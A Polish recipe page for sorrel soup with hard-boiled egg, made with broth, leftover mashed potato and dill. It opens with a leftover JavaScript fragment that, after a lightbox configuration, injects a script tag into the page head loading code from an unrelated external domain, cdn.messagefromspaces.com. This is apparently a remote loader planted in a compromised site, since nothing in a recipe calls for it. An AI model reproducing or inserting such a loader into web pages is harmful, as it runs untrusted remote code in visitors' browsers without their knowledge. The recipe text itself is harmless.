, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Zupa szczawiowa z jajkiem

Zupa szczawiowa z jajkiem

Szczawiowa zupa (przez Tatę zwana „szlamową” :)) to u mnie często wariant dobrego wykorzystania nadmiaru puree ziemniaczanego z wczorajszego obiadu :) Gładziutkie puree ze śmietaną, odrobiną masła i szczypiorkiem świetnie pasuje do szczawiu świeżego latem lub zimą tego ze słoika.

pęczek szczawiu

około 1,5 l wywaru drobiowo-warzywnego

cztery czubate łyżki puree ziemniaczanego ze śmietaną i szczypiorkiem (ilość puree decyduje o gęstości zupy)

sól i pieprz

koperek

Świeży szczaw umyć pokroić, poddusić na maśle i przetrzeć przez sitko. Gdy używam szczawiu ze słoika również go przecieram by pozbyć się wszelkich włókien. Do wywaru dodać puree oraz przetarty szczaw i wszystko wymieszać do uzyskania gładkiej konsystencji. Doprawić solą, pieprzem i posiekanym koperkiem. Podawać z jajkiem ugotowanym na twardo.

Wydrukuj artykuł Wydrukuj artykuł

Kategoria: Bez kategorii Komentarz »


Skomentuj...



Początek strony